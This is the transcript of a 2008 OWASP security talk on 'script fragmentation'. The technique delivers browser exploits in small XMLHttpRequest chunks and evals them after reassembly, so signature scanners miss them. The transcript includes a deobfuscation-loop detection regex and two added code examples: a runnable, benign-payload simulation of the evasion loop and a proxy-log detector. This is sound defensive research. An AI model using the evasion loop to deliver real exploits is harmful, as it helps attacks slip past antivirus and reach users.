Script Fragmentation - Stephan Chenette - OWASP/RSA 2008

ERA 2008 - Stephan Chenette, Presentation on Script Fragmentation attack
Abstract: This presentation will introduce a new web-based attack vector which utilizes client-side scripting to fragment malicious web content.

This involves distributing web exploits in an asynchronous manner to evade signature detection. Similar to TCP fragmentation attacks, which are still an issue in current IDS/IPS products, this attack vector involves sending any web exploit in fragments and uses the already existing components within the web browser to reassemble and execute the exploit.

Our presentation will discuss this attack vector used to evade both gateway and client-side detection. We will show several proofs of concept containing common, readily available web exploits.

Presentation Transcript

  • Script Fragmentation Attacks. OWASP, November 2008. Stephan Chenette, Security Researcher, Websense Security Labs
  • Agenda: What; Web Developer 101; Web 1.0 versus Web 2.0; Malicious Web 1.0; Malicious Web 2.0 + Script Fragmentation; Possible Solutions
  • What am I talking about today. The success of any exploit depends on some basic assumptions. The vulnerable service or application is: 1) active, 2) accessible. The exploit is: 1) reliable, 2) undetected.
  • What am I talking about today. This presentation will focus on evading detection of the exploit. Specifically: a new evasion technique to avoid detection of client-side web exploitation (browser, ActiveX control, etc. bugs).
  • Basic Web Developer 101: HTML; Browser Document Object Model (DOM); JavaScript/JSON; Remote requests: XMLHttpRequest (XHR); Cross-domain requests: XDomainRequest (XDR). XHR is available in Internet Explorer, Firefox, Safari, Opera, Konqueror, etc.; XDomainRequest is specific to Internet Explorer 8.
  • Basic HTML document and DOM
        <html>
          <body>
            <div id="target"></div>
          </body>
        </html>
    The browser parses this HTML into a DOM tree with the same structure: html > body > div#target.
  • JavaScript can change the DOM
        <script>
          var d = document.getElementById("target");
          var n = document.createElement("script");
          n.text = "alert('test');";
          d.appendChild(n);
        </script>
  • New DOM
        <html>
          <body>
            <div id="target">
              <script>alert('test');</script>
            </div>
          </body>
        </html>
  • Basic HTML document
        <html>
          <body>
          </body>
        </html>
  • JavaScript can execute directly
        var text = "alert('test');";
        eval(text);
  • DOM stays the same
        <html>
          <body>
          </body>
        </html>
  • The power of scripting
        var text = "ale" + "rt(" + "'te" + "st'" + ");";
        eval(text);
  • JSON basics
        var text = '{ "firstName" : "John", "lastName" : "Doe" }';   // JSON arrives as a string
        var JSONObj = eval("(" + text + ")");   // parentheses make the braces parse as an object literal, not a block
        document.writeln(JSONObj.firstName);    // outputs John
        document.writeln(JSONObj.lastName);     // outputs Doe
  • XHR basics
        function handler() {
          if (client.readyState === 4) {
            // client.responseText now holds the response body
          }
        }
        var client = new XMLHttpRequest();
        client.onreadystatechange = handler;
        client.open("GET", "test.cgi");
        client.send();

        var message = "log entry";   // request body (not defined on the slide)
        var client = new XMLHttpRequest();
        client.open("POST", "/log");
        client.setRequestHeader("Content-Type", "text/plain;charset=UTF-8");
        client.send(message);
  • XDR requests (cross-site requests)
        var xdr = new XDomainRequest();   // Internet Explorer 8
        xdr.onload = handler;
        xdr.open("GET", "http://test.com/test.cgi");
        xdr.send();

        var xhr = new XMLHttpRequest();   // other browsers: cross-site XHR, which the target server must permit
        xhr.onload = handler;
        xhr.open("GET", "http://test.com/test.cgi");
        xhr.send();
  • Web 1.0 client/server communication: Client Browser sends "GET / HTTP/1.1" to Web Server, which returns the page.
  • Web 2.0 websites: client fetching content from multiple servers + servers receiving content from the client. Benign JavaScript/XMLHttpRequest technologies: gadgets, widgets, mashups. Gmail, orkut, facebook, hi5.com, etc. use JavaScript and XMLHttpRequest.
  • Web 2.0 websites: Client Browser exchanging many requests and responses with the Web Server (and other servers).
  • Web attacks and defense: Attack trends have shifted over the years. Intruders are focusing more prominently on the Web. Most companies/users don't block HTTP at the firewall. ALL malicious client-side web attacks are assumed to be protected against by desktop or gateway AV/IDS.
  • HTTP client/server communication: Client Browser sends "GET / HTTP/1.1" to Web Server.
  • Current desktop/gateway protection: looking at the initial content.
  • Current evasion techniques: obfuscated JS code.
  • REGEX for deobfuscation routine. Sample loop:
        for (fubatifi = 0; fubatifi < 1445; fubatifi++)
          fepab += String.fromCharCode(mosetib[fubatifi] ^ fedene);
    Signature:
        for\s{0,5}\(\w{0,10}\s{0,5}=\s{0,5}0;\s{0,5}\w{0,10}\s{0,5}<\s{0,5}\d{0,10};\s{0,5}\w{0,10}\+\+\)\s{0,5}\w{0,10}\s{0,5}\+=\s{0,5}String\.fromCharCode\(\w{0,10}\[\w{0,10}\]\s{0,2}\^\s{0,2}\w{0,10}\);
  • Successful evasion... Passing malicious content over the network has a higher chance of evading detection the more indistinguishable it is from benign traffic. A.k.a. make malicious Web 2.0 traffic look like good Web 2.0 traffic.
  • Malicious Web 2.0 / Script Fragmentation. Script: active content, e.g. JavaScript, VBScript, etc. Fragmentation: little chunks of data. Note: the use of AJAX for malicious purposes was mentioned at Toorcon 2007, but not in the detail I'm about to go into...
  • Dynamic retrieval of data
        <script>
          var xmlhttp = new XMLHttpRequest();
          xmlhttp.onreadystatechange = function () {
            if (xmlhttp.readyState === 4) {
              var response = xmlhttp.responseText;   // "4"
            }
          };
          xmlhttp.open("GET", "/index.php?q=2+2", true);
          xmlhttp.send();
        </script>
    Client Browser sends GET /index.php?q=2+2; Web Server responds "4".
  • Steps for script fragmentation attack
    1. Store malicious content on server.
    2. SERVER: serve client webpage with script fragmentation decoder routine.
    3. CLIENT: use XMLHttpRequest object to request only a small chunk of malicious content from server.
    4. SERVER: respond with requested chunk of malicious content.
    5. CLIENT: use a JavaScript variable to save chunks of data and continue to use JavaScript and the XMLHttpRequest object to request new chunks of data until there is no more data.
    6. CLIENT: execute resulting code once all data is received.
  • Steps in action. Step 1) Store malicious content on server (Web Server).
  • Steps in action. Step 2) SERVER: serve client webpage with script fragmentation decoder routine. Web Server sends <DECODER> to Client Browser.
  • Script Fragmentation decoder routine
  • Steps in action. Step 3) CLIENT: use XMLHttpRequest object to request only a small chunk of malicious content from server. Client Browser sends GET /index.cgi?o=0&rl=3 to Web Server.
  • Steps in action. Step 4) SERVER: respond with requested chunk of malicious content. Web Server returns "var".
  • Steps in action. Step 5) CLIENT: store chunk and continually request more chunks until there is no more data. GET /index.cgi?o=3&rl=3 returns " he"; var text = "var he";
  • Steps in action. Step 5, continued) GET /index.cgi?o=6&rl=3 returns "apS"; var text = "var heapS";
  • Steps in action. Step 5, continued) GET /index.cgi?o=9&rl=3 returns "pra"; var text = "var heapSpra";
  • Steps in action. Step 5, continued) GET /index.cgi?o=12&rl=3 returns "yTo"; var text = "var heapSprayTo";
  • Steps in action. Step 6) CLIENT: execute resulting code once all data is received.
        // Method 1
        eval(text);
        // Method 2
        var div = document.getElementById('target');
        var n = document.createElement("script");
        n.text = text;
        div.appendChild(n);
  • The possibilities. Beyond the basic script fragmentation attack: randomize the sequence of offsets; XOR/encrypt the data; spread the data across multiple web servers (botnet) (XDR); in memory, keep the string encrypted until the last minute.
  • Options for data transfer. XMLHttpRequest is the object used to make dynamic remote HTTP requests, but there are multiple data formats that may be used for data transfer: raw, XML, JSON, etc.
  • RAW data format: GET /index.cgi?o=0&rl=3&u=guid; Web Server returns "var".
  • XML data format: GET /index.cgi?o=0&rl=3; Web Server returns <Data eof="0" text="var" />.
  • JSON data format: GET /index.cgi?o=0&rl=3; Web Server returns { eof : "0", text : "var" }. Client:
        var data = eval("(" + S + ")");   // S = server response
        var text = data.text;
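The full loop from the steps above, carried across the three wire formats, as an added example that is not code from the presentation: a Node.js simulation in which an in-memory chunk server stands in for the web server and a plain function call stands in for the XMLHttpRequest GET (both assumptions of this example). The stored "malicious content" is a benign XOR-decoding loop chosen so that the deobfuscation-loop signature from the REGEX slide can be tested against the reassembled string and against each 3-byte chunk.

```javascript
// Added example, not code from the presentation: an offline simulation of the
// script fragmentation loop from the "Steps for script fragmentation attack"
// and "data format" slides. The chunk server and the transport are in-memory
// stand-ins for the web server and XMLHttpRequest (assumptions of this example).

// Step 1: the content stored on the server. A benign stand-in for the exploit:
// a XOR deobfuscation loop of the shape the deck's regex signature targets.
const STORED_PAYLOAD =
  'var c = [9, 4, 13, 13, 14], k = 0x61, s = "", i;\n' +
  'for (i = 0; i < 5; i++) s += String.fromCharCode(c[i] ^ k);\n' +
  's;';

// The deobfuscation-loop signature from the "REGEX for deobfuscation routine" slide.
const DEOBFUSCATION_LOOP_RE =
  /for\s{0,5}\(\w{0,10}\s{0,5}=\s{0,5}0;\s{0,5}\w{0,10}\s{0,5}<\s{0,5}\d{0,10};\s{0,5}\w{0,10}\+\+\)\s{0,5}\w{0,10}\s{0,5}\+=\s{0,5}String\.fromCharCode\(\w{0,10}\[\w{0,10}\]\s{0,2}\^\s{0,2}\w{0,10}\);/;

const XML_ESC = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;' };
const XML_UNESC = { amp: '&', lt: '<', gt: '>', quot: '"' };
const xmlEscape = (s) => s.replace(/[&<>"]/g, (ch) => XML_ESC[ch]);
const xmlUnescape = (s) => s.replace(/&(amp|lt|gt|quot);/g, (_, n) => XML_UNESC[n]);

// Server side of GET /index.cgi?o=<offset>&rl=<length>: one chunk of the stored
// payload in the chosen wire format (steps 2 and 4). eof flags the last chunk.
function makeChunkServer(payload, format) {
  return function serve(o, rl) {
    const text = payload.slice(o, o + rl);
    const eof = o + rl >= payload.length ? '1' : '0';
    switch (format) {
      case 'raw':  return text;   // no framing: the client detects eof by an empty body
      case 'xml':  return `<Data eof="${eof}" text="${xmlEscape(text)}" />`;
      case 'json': return JSON.stringify({ eof, text });
      default:     throw new Error('unknown format ' + format);
    }
  };
}

// Client side: unpack one response body into { text, eof }.
function parseChunk(body, format) {
  switch (format) {
    case 'raw':  return { text: body, eof: body.length === 0 };
    case 'xml': {
      const m = /<Data eof="([01])" text="([^"]*)" \/>/.exec(body);
      return { text: xmlUnescape(m[2]), eof: m[1] === '1' };
    }
    case 'json': {
      const d = eval('(' + body + ')');   // the deck's eval-based JSON decode
      return { text: d.text, eof: d.eof === '1' };
    }
    default:     throw new Error('unknown format ' + format);
  }
}

// Steps 3 and 5: the decoder routine. `request(o, rl)` stands in for a
// synchronous XMLHttpRequest GET and returns the response body. Chunks are
// appended to a JavaScript string until the server signals eof.
function assemble(request, format, chunkLen) {
  const chunks = [];
  let text = '';
  for (let o = 0; ; o += chunkLen) {
    const chunk = parseChunk(request(o, chunkLen), format);
    chunks.push(chunk.text);
    text += chunk.text;
    if (chunk.eof) break;
  }
  return { text, chunks };
}

// Step 6, "Method 1": execute the reassembled code with eval.
function runAssembled(text) {
  return eval(text);
}

// Run the whole loop for one wire format and report what a scanner sees:
// the signature fires on the reassembled string, never on any single chunk.
function demo(format, chunkLen) {
  const server = makeChunkServer(STORED_PAYLOAD, format);
  const { text, chunks } = assemble(server, format, chunkLen);
  return {
    format,
    requests: chunks.length,
    reassembledMatchesOriginal: text === STORED_PAYLOAD,
    signatureHitsAssembled: DEOBFUSCATION_LOOP_RE.test(text),
    signatureHitsAnyChunk: chunks.some((c) => DEOBFUSCATION_LOOP_RE.test(c)),
    result: runAssembled(text),
  };
}

console.log(['raw', 'xml', 'json'].map((f) => demo(f, 3)));
```

Run with node. For each format it reports the number of requests, whether reassembly was exact, and that the signature matches the assembled string but none of the chunks, which is the whole point of the evasion: a scanner that only sees one HTTP response at a time has nothing to match. A browser version replaces `request` with a callback-driven XMLHttpRequest, and "Method 2" from the execution slide replaces `runAssembled` with a script element appended to the DOM.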
  • Flawlessly works on all major browsers. Proof of concept (PoC) exploited within 10-20 s.
  • AV won't detect script fragmentation. The initial page holds the decoder routine in a script tag and then a blank body. The file on disk will never change. The DOM in memory will never change. NO SUBSTANTIAL CONTENT TO SCAN AS MALICIOUS!
  • HTML file on disk. The file on disk is the same before and after: C:\Documents and Settings\<USER>\Local Settings\Temporary Internet Files
  • Victory! Script fragmentation is a very successful evasion attack that current desktop and gateway AV do not detect.
  • Ending remarks. Reality: this attack is still a few years away; we haven't seen this in the wild. Possible reasons: dealing with scripting and obfuscation are still the biggest problems.
  • Possible solutions:
    - Detecting the decoder routine
    - Detecting network anomalies
    - Using a "feedback loop" and executing in a remote location
    - Disallowing execution of content that comes from XMLHttpRequest: hard to implement and would break functionality, so no go
    - Post-detection
    - Hooking browser internals
    - Installing security add-ons: NoScript, Flashblock, SafeHistory, Adblock Plus, LocalRodeo, CustomizeGoogle, etc.
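One way to act on the "detecting network anomalies" option above, as an added example that is not the presenter's code: a detector run over constructed proxy-log lines that flags a client pulling many tiny, offset-ordered responses from one path. The log format, the o= parameter name and the thresholds are assumptions of this example.

```javascript
// Added example, not code from the presentation: a network-anomaly check for
// script fragmentation over web-proxy access logs, one of the "Possible
// solutions" on the closing slide. The log format, field order and thresholds
// below are assumptions made for this example.

// Constructed sample log, one request per line:
//   "<time> <client> <method> <url> <status> <response-bytes>"
// 10.0.0.5 runs a decoder loop (12 tiny GETs with increasing o=), 10.0.0.7 pages
// through a feed with an o= parameter but large responses, and 10.0.0.9 polls a
// chat endpoint with tiny responses but no offset parameter.
const SAMPLE_LOG_LINES = [
  '10:00:00 10.0.0.7 GET /mail/inbox?page=1 200 18422',
  '10:00:00 10.0.0.7 GET /feed?o=0&rl=50 200 5120',
  ...Array.from({ length: 12 }, (_, i) =>
    `10:00:01 10.0.0.5 GET /index.cgi?o=${i * 3}&rl=3 200 3`),
  ...Array.from({ length: 10 }, (_, i) =>
    `10:00:02 10.0.0.9 GET /chat/poll?since=${i} 200 12`),
  '10:00:03 10.0.0.7 GET /feed?o=50&rl=50 200 4988',
];

const MIN_RUN = 8;          // consecutive chunk requests before a client is flagged
const MAX_CHUNK_BYTES = 64; // responses this small look like fragments, not pages

function parseLine(line) {
  const [time, client, method, url, status, bytes] = line.trim().split(/\s+/);
  const u = new URL(url, 'http://placeholder'); // base only so a bare path parses
  const hasOffset = u.searchParams.has('o');
  return {
    time, client, method, path: u.pathname, status: Number(status), bytes: Number(bytes),
    offset: hasOffset ? Number(u.searchParams.get('o')) : NaN,
  };
}

// A "run" is a sequence of requests from one client to one path whose offset
// parameter strictly increases and whose responses are all tiny. Runs are
// tracked per client+path so interleaved traffic from other clients does not
// break them; a request that does not fit closes the run.
function detectFragmentation(lines) {
  const runs = new Map();
  const findings = [];
  const close = (key, run) => {
    if (run && run.count >= MIN_RUN) {
      const [client, path] = key.split(' ');
      findings.push({ client, path, requests: run.count, bytesTransferred: run.bytes, firstSeen: run.start });
    }
    runs.delete(key);
  };
  for (const r of lines.map(parseLine)) {
    const key = `${r.client} ${r.path}`;
    const run = runs.get(key);
    const fragmentLike = Number.isFinite(r.offset) && r.bytes <= MAX_CHUNK_BYTES;
    if (run && fragmentLike && r.offset > run.lastOffset) {
      run.lastOffset = r.offset; run.count += 1; run.bytes += r.bytes;
    } else {
      close(key, run);
      if (fragmentLike) runs.set(key, { lastOffset: r.offset, count: 1, bytes: r.bytes, start: r.time });
    }
  }
  for (const [key, run] of [...runs]) close(key, run);
  return findings;
}

console.log(detectFragmentation(SAMPLE_LOG_LINES));
```

The check keys on a strictly increasing offset parameter, so it is defeated by the randomized-offset and multi-server (XDR) variants from the "possibilities" slide; a sturdier version would count tiny same-path responses per client per time window regardless of parameter names, at the cost of more false positives from legitimate polling such as the /chat/poll traffic in the sample.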
  • Thank you. Any questions? Stephan Chenette, Websense Security Labs, schenette@websense.com. Check out our website and blogs: http://securitylabs.websense.com/content/blogs.aspx and http://securitylabs.websense.com/